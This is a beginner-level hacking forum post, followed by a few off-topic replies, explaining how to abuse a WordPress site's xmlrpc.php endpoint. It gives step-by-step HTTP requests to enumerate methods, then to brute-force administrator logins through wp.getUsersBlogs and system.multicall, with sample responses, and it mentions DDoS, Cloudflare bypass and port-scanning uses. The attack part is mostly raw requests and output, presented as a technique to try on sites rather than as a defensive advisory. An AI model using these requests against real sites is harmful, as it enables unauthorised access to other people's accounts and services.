Hi all. Today I decide to make my first post on series of "Everyday My Scanning Trip" threads to sharing some funny knowledge I have or ever had on the hacking way to you, at least some newbie like me. Hope you love my series. <3[size=large]#1 Exploit xmlrpc.php on Wordpress[/size]I have saw this vulnerability long time ago but because it was somehow useless so I has forgot it till now. When I made scan on some website and I see it appear again. So I'll share the way to making some funny with this vulnerability.[align=center][attachment=985][/align] [list=1][*] At first, you'll need the Burfsuite Pro version (or any software let you send the header request)[*] Ensure you are targeting a WordPress site.[*] Ensure you have access to the xmlrpc.php file. In general, it is found at https://example.com/xmlrpc.php and would reply to a GET request with: [code]XML-RPC server accepts POST requests only.[/code][*] It will be pointless to target an XML-RPC server which is disabled/hardcoded/tampered/not working. Therefore, we will check its functionality by sending the following request:[code]Post Request:POST /xmlrpc.php HTTP/1.1Host: example.comContent-Length: 135 system.listMethods [/code]The normal response should be:[code]HTTP/1.1 200 OK Date: Mon, 01 Jul 2019 17:13:30 GMT Server: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains; preloadConnection: closeVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradeContent-Length: 4272Content-Type: text/xml; charset=UTF-8 system.multicall system.listMethods system.getCapabilities demo.addTwoNumbers demo.sayHello pingback.extensions.getPingbacks pingback.ping mt.publishPost mt.getTrackbackPings mt.supportedTextFilters mt.supportedMethods mt.setPostCategories mt.getPostCategories mt.getRecentPostTitles mt.getCategoryList metaWeblog.getUsersBlogs metaWeblog.deletePost metaWeblog.newMediaObject metaWeblog.getCategories metaWeblog.getRecentPosts metaWeblog.getPost metaWeblog.editPost metaWeblog.newPost blogger.deletePost blogger.editPost blogger.newPost blogger.getRecentPosts blogger.getPost blogger.getUserInfo blogger.getUsersBlogs wp.restoreRevision wp.getRevisions wp.getPostTypes wp.getPostType wp.getPostFormats wp.getMediaLibrary wp.getMediaItem wp.getCommentStatusList wp.newComment wp.editComment wp.deleteComment wp.getComments wp.getComment wp.setOptions wp.getOptions wp.getPageTemplates wp.getPageStatusList wp.getPostStatusList wp.getCommentCount wp.deleteFile wp.uploadFile wp.suggestCategories wp.deleteCategory wp.newCategory wp.getTags wp.getCategories wp.getAuthors wp.getPageList wp.editPage wp.deletePage wp.newPage wp.getPages wp.getPage wp.editProfile wp.getProfile wp.getUsers wp.getUser wp.getTaxonomies wp.getTaxonomy wp.getTerms wp.getTerm wp.deleteTerm wp.editTerm wp.newTerm wp.getPosts wp.getPost wp.deletePost wp.editPost wp.newPost wp.getUsersBlogs [/code]Note that in the absence of the above-presented example response, it is rather pointless to proceed with actual testing of the two vulnerabilities. The response might vary based on the settings and configurations of the WordPress installation.[*]If there is an output for system.listMethods then it is recommended to interact with at least the most basic method called demo.sayHello. Like this:[code]Request:POST /xmlrpc.php HTTP/1.1Host: example.comContent-Length: 130 demo.sayHello Response:HTTP/1.1 200 OKDate: Mon, 01 Jul 2019 17:19:05 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains; preloadConnection: closeVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradeContent-Length: 181Content-Type: text/xml; charset=UTF-8 Hello! [/code][*]Exploit this vulnerability:This vulnerability have some ways to exploit- Distributed denial-of-service (DDoS) attacks- Cloudflare Protection Bypass- XSPA (Cross Site Port Attack). But usually the attacker use it to brute force the superadmin user. The following request represents the most common brute force attack:[code]POST /xmlrpc.php HTTP/1.1Host: example.comContent-Length: 235 wp.getUsersBlogs \{\{your username\}\} \{\{your password\}\} [/code]The following request requires permissions for both system.multicall and wp.getUsersBlogs methods:[code]POST /xmlrpc.php HTTP/1.1Host: example.comContent-Length: 1560system.multicallmethodNamewp.getUsersBlogsparams\{\{ Your Username \}\}\{\{ Your Password \}\}methodNamewp.getUsersBlogsparams\{\{ Your Username \}\}\{\{ Your Password \}\}methodNamewp.getUsersBlogsparams\{\{ Your Username \}\}\{\{ Your Password \}\}methodNamewp.getUsersBlogsparams\{\{ Your Username \}\}\{\{ Your Password \}\}[/code]The response will look like:[code]HTTP/1.1 200 OKDate: Mon, 01 Jul 2019 23:02:55 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains; preloadConnection: closeVary: Accept-EncodingReferrer-Policy: no-referrer-when-downgradeContent-Length: 1043Content-Type: text/xml; charset=UTF-8 faultCode403 faultStringIncorrect username or password. faultCode403 faultStringIncorrect username or password. faultCode403 faultStringIncorrect username or password. faultCode403 faultStringIncorrect username or password. [/code]Or you could write or clone some git directories to make the brute-force automated.[*]Conclusion:Because you must need two big word lists "usernames" and "passwords" to exploit this vulnerability, it's waste a lot of time and resources to get the result. Somehow, it's useless vulnerability for the attacker and bug bounty hunters (of course). But, I hope you will receive some funny time on the tired hacking way. Thank you!![/list][hr]Oh what happened?. My really long post ever. It's so sad.

trash thread

This made me tear up

(September 18, 2022, 02:28 PM)entrypoint78 Wrote: This made me tear up

+Saddest movie ending of all time

fixed!!!!

Thank you so much for your help.

that's good friend